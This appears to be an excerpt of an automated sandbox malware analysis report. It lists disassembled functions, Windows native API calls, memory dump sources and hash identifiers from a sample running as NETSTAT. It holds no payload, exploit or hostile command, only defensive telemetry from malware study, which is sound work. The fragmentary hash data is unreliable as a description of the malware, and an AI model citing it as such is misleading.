                                                                                                                                                                            Function 02DBA042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • NtQueryInformationProcess.NTDLL ref: 02DBA19F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129812229.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2db0000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InformationProcessQuery
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 1778838933-4108050209
                                                                                                                                                                            • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                                            • Instruction ID: d18b71edbc8ba98632fdc904a516537ead805d1b10f9d2bde1c2eb992df15e4a
                                                                                                                                                                            • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                                            • Instruction Fuzzy Hash: F3512B70918A8C8FDB69EF68C8946EEB7F5FF98305F40462AD84AD7210DF349645CB41
                                                                                                                                                                            Function 0052A2DA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70filenativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 545 52a2da-52a2db 546 52a31e-52a371 call 52af20 NtCreateFile 545->546 547 52a2dd-52a319 call 52af20 545->547
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00524BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00524BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0052A36D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID: .z`
                                                                                                                                                                            • API String ID: 823142352-1441809116
                                                                                                                                                                            • Opcode ID: 980e77addbe127181fd9b4928a05b8f521c44176c3d0d8ef51820e773fe3be85
                                                                                                                                                                            • Instruction ID: 88c73ef551b7b7c62f6a144056750808b7b2159ae09765d578392b7dcf9231d9
                                                                                                                                                                            • Opcode Fuzzy Hash: 980e77addbe127181fd9b4928a05b8f521c44176c3d0d8ef51820e773fe3be85
                                                                                                                                                                            • Instruction Fuzzy Hash: C811D3B2204209AFDB08DF88DC85EEB77A9AF8C754F158548BA1997241D630E811CBA0
                                                                                                                                                                            Function 0052A320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 561 52a320-52a336 562 52a33c-52a371 NtCreateFile 561->562 563 52a337 call 52af20 561->563 563->562
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00524BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00524BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0052A36D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID: .z`
                                                                                                                                                                            • API String ID: 823142352-1441809116
                                                                                                                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                            • Instruction ID: 808f23ed0322d27c9619c967136bed9226abbdb15b2725adc99670b582fb7017
                                                                                                                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                            • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241D630E811CBA4
                                                                                                                                                                            Function 0052A3D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 564 52a3d0-52a419 call 52af20 NtReadFile
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!JR,FFFFFFFF,?,bMR,?,00000000), ref: 0052A415
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                            • String ID: !JR
                                                                                                                                                                            • API String ID: 2738559852-1228759698
                                                                                                                                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                            • Instruction ID: c56b2ee5126e4084d9eed046d44861a51aeb357f66d49a7b08bea3654abaa679
                                                                                                                                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                            • Instruction Fuzzy Hash: 47F0A4B6200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97245D630E811CBA0
                                                                                                                                                                            Function 0052A44A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtClose.NTDLL(@MR,?,?,00524D40,00000000,FFFFFFFF), ref: 0052A475
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close
                                                                                                                                                                            • String ID: @MR
                                                                                                                                                                            • API String ID: 3535843008-1332303170
                                                                                                                                                                            • Opcode ID: a8ee89969e478624c327e058f68819eb69bf11cadadd1e1f1049b79acb303f13
                                                                                                                                                                            • Instruction ID: 31d2183179dc914af15eb517875c0b226d066ccbb6be7862a3299c7d9949e97a
                                                                                                                                                                            • Opcode Fuzzy Hash: a8ee89969e478624c327e058f68819eb69bf11cadadd1e1f1049b79acb303f13
                                                                                                                                                                            • Instruction Fuzzy Hash: 99E0C2766401106BD720DBA4EC8AEEB7F28EF84310F1845A8FA4CDB242D534E610C7D0
                                                                                                                                                                            Function 0052A450 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtClose.NTDLL(@MR,?,?,00524D40,00000000,FFFFFFFF), ref: 0052A475
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close
                                                                                                                                                                            • String ID: @MR
                                                                                                                                                                            • API String ID: 3535843008-1332303170
                                                                                                                                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                            • Instruction ID: 88a36bd77c65c5801f1799ea5197e8e206c61bee7286eeb5f53044f0e542cd0a
                                                                                                                                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                            • Instruction Fuzzy Hash: A6D01776200214ABD710EB98DC89EA77BACEF88760F154499BA189B282D530FA0086E0
                                                                                                                                                                            Function 0052A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00512D11,00002000,00003000,00000004), ref: 0052A539
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2167126740-0
                                                                                                                                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                            • Instruction ID: 293c0815de7640dfa394b58dff2a9261d4775abedd54b4260f55379a44884eae
                                                                                                                                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                            • Instruction Fuzzy Hash: FEF015B6200218ABCB14DF89DC81EAB77ADAF88754F118148BE0897241C630F810CBA0
                                                                                                                                                                            Function 03182B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 0bcfe5845ba2fd451f5654ec3534a6c9b82e755b080cd36c9c8a780b1fcccbd3
                                                                                                                                                                            • Instruction ID: d8bd4893e84391c255f6e314948f275716f435e68249f9bf4b6c23db9dc38ec9
                                                                                                                                                                            • Opcode Fuzzy Hash: 0bcfe5845ba2fd451f5654ec3534a6c9b82e755b080cd36c9c8a780b1fcccbd3
                                                                                                                                                                            • Instruction Fuzzy Hash: 25900261602404035505B1584514616400A87E5201B55D022E1019590DC72589916129
                                                                                                                                                                            Function 03182BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 60d7d41157a8883bd437426f217e81cbac8a24e28d0550188a2dde96d736681d
                                                                                                                                                                            • Instruction ID: d39b753849ddb8b6fa88e95231e93b82fb5910af1068c53e9a05c636608a10b1
                                                                                                                                                                            • Opcode Fuzzy Hash: 60d7d41157a8883bd437426f217e81cbac8a24e28d0550188a2dde96d736681d
                                                                                                                                                                            • Instruction Fuzzy Hash: A390023160140C03E580B158450464A000587D6301F95D016A002A654DCB158B5977A5
                                                                                                                                                                            Function 03182BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: e26e3ba7ec0dfb12adcbfbb3dfcecfafebf3d339caf56b5eafd110511dc75d37
                                                                                                                                                                            • Instruction ID: 6ea592d64b8e8dc17b71fb399decc6036a012a8002236dc48db86c6e6d8a71c0
                                                                                                                                                                            • Opcode Fuzzy Hash: e26e3ba7ec0dfb12adcbfbb3dfcecfafebf3d339caf56b5eafd110511dc75d37
                                                                                                                                                                            • Instruction Fuzzy Hash: 0290023160544C43E540B1584504A46001587D5305F55D012A0069694D97258E55B665
                                                                                                                                                                            Function 03182AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: f2ba58edbf92412b9fcaaa87d7dbb5351fb321180cc4885ff7a503f5cb71229b
                                                                                                                                                                            • Instruction ID: 33702ac57124124d67afa84a66f4fefd5d5296c344f61e1f3f56cee062fe08bc
                                                                                                                                                                            • Opcode Fuzzy Hash: f2ba58edbf92412b9fcaaa87d7dbb5351fb321180cc4885ff7a503f5cb71229b
                                                                                                                                                                            • Instruction Fuzzy Hash: 44900435711404031505F55C07045070047C7DF351355D033F101F550CD731CD715135
                                                                                                                                                                            Function 03182F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: ed1ebe23f4cf7605ec45ee1e797d20ec4a89d64668b4741749b678ac5266903d
                                                                                                                                                                            • Instruction ID: 1c931d2e0609b89483c57d97f2bd290f4ce4456a76911064216e3ad26ed278ad
                                                                                                                                                                            • Opcode Fuzzy Hash: ed1ebe23f4cf7605ec45ee1e797d20ec4a89d64668b4741749b678ac5266903d
                                                                                                                                                                            • Instruction Fuzzy Hash: E890026174140843E500B1584514B060005C7E6301F55D016E1069554D8719CD52612A
                                                                                                                                                                            Function 03182FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: e42cce0563d577a16d82d1659efa29bd4c7c86ed9322edbf49ca66d2fc04656a
                                                                                                                                                                            • Instruction ID: 62899d29cf26d88080e9eb023d5151fbb1500ff60277fd9050bf6e9f1b5a1123
                                                                                                                                                                            • Opcode Fuzzy Hash: e42cce0563d577a16d82d1659efa29bd4c7c86ed9322edbf49ca66d2fc04656a
                                                                                                                                                                            • Instruction Fuzzy Hash: 69900221611C0443E600B5684D14B07000587D5303F55D116A0159554CCB1589615525
                                                                                                                                                                            Function 03182EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: bffa766f44f9f806248578854bd0e4ffd1a3de90747e9573a35cfd95357763f4
                                                                                                                                                                            • Instruction ID: f8db2ff6a7d9a2a070bdc00b675c1994c0338f8f032ee20f605ac8e60899c4d8
                                                                                                                                                                            • Opcode Fuzzy Hash: bffa766f44f9f806248578854bd0e4ffd1a3de90747e9573a35cfd95357763f4
                                                                                                                                                                            • Instruction Fuzzy Hash: 9290027160140803E540B1584504746000587D5301F55D012A5069554E87598ED56669
                                                                                                                                                                            Function 03182D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 1889a85ca616d9c63695dd258030c4876a1e5ead28464905ef1e9e33a261c327
                                                                                                                                                                            • Instruction ID: 4c9688672ede83a670184d5c73eb94b38e31927a3e7ef667e2ce3826ea3bd7d6
                                                                                                                                                                            • Opcode Fuzzy Hash: 1889a85ca616d9c63695dd258030c4876a1e5ead28464905ef1e9e33a261c327
                                                                                                                                                                            • Instruction Fuzzy Hash: F190022961340403E580B158550860A000587D6202F95E416A001A558CCB1589695325
                                                                                                                                                                            Function 03182DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 9fa915a8cd6930a1b26f244741f0fb8ffabc4af18817125f457a75488acebbd0
                                                                                                                                                                            • Instruction ID: 9c97b98a85ceb7c0c2334a833695da66ae778d31fa262f61758f88b2853de062
                                                                                                                                                                            • Opcode Fuzzy Hash: 9fa915a8cd6930a1b26f244741f0fb8ffabc4af18817125f457a75488acebbd0
                                                                                                                                                                            • Instruction Fuzzy Hash: 34900221642445536945F1584504507400697E5241795D013A1419950C87269956D625
                                                                                                                                                                            Function 03182DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 29649ba5ba17f6736df832ba000a9ab4c2639660d5ea8c8c59dda7fdb93e03d0
                                                                                                                                                                            • Instruction ID: 26cbd7d12599a85cc825a28bbc3770e768ec8cbd69694b26b56b13ff2459342a
                                                                                                                                                                            • Opcode Fuzzy Hash: 29649ba5ba17f6736df832ba000a9ab4c2639660d5ea8c8c59dda7fdb93e03d0
                                                                                                                                                                            • Instruction Fuzzy Hash: 0290023160140813E511B1584604707000987D5241F95D413A0429558D97568A52A125
                                                                                                                                                                            Function 03182C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 5bec8825cdd95e31826dddb833655979ddf89ddefaa3a9a31e8309e59402989c
                                                                                                                                                                            • Instruction ID: 33309a373755400ac682e1e90de5edf32e6b70f14864c4d80b42e601377c5f9e
                                                                                                                                                                            • Opcode Fuzzy Hash: 5bec8825cdd95e31826dddb833655979ddf89ddefaa3a9a31e8309e59402989c
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D90023160148C03E510B158850474A000587D5301F59D412A4429658D879589917125
                                                                                                                                                                            Function 03182C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 866621d45d79d928765590aab8e0d51329798e827f1af4eb87e250a7d6455e48
                                                                                                                                                                            • Instruction ID: e1b5add47eae364df2f1a4b6d667049b7fa5c264c3a63f08b5de6cb583788f6f
                                                                                                                                                                            • Opcode Fuzzy Hash: 866621d45d79d928765590aab8e0d51329798e827f1af4eb87e250a7d6455e48
                                                                                                                                                                            • Instruction Fuzzy Hash: 5290023160140C43E500B1584504B46000587E5301F55D017A0129654D8715C9517525
                                                                                                                                                                            Function 03182CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
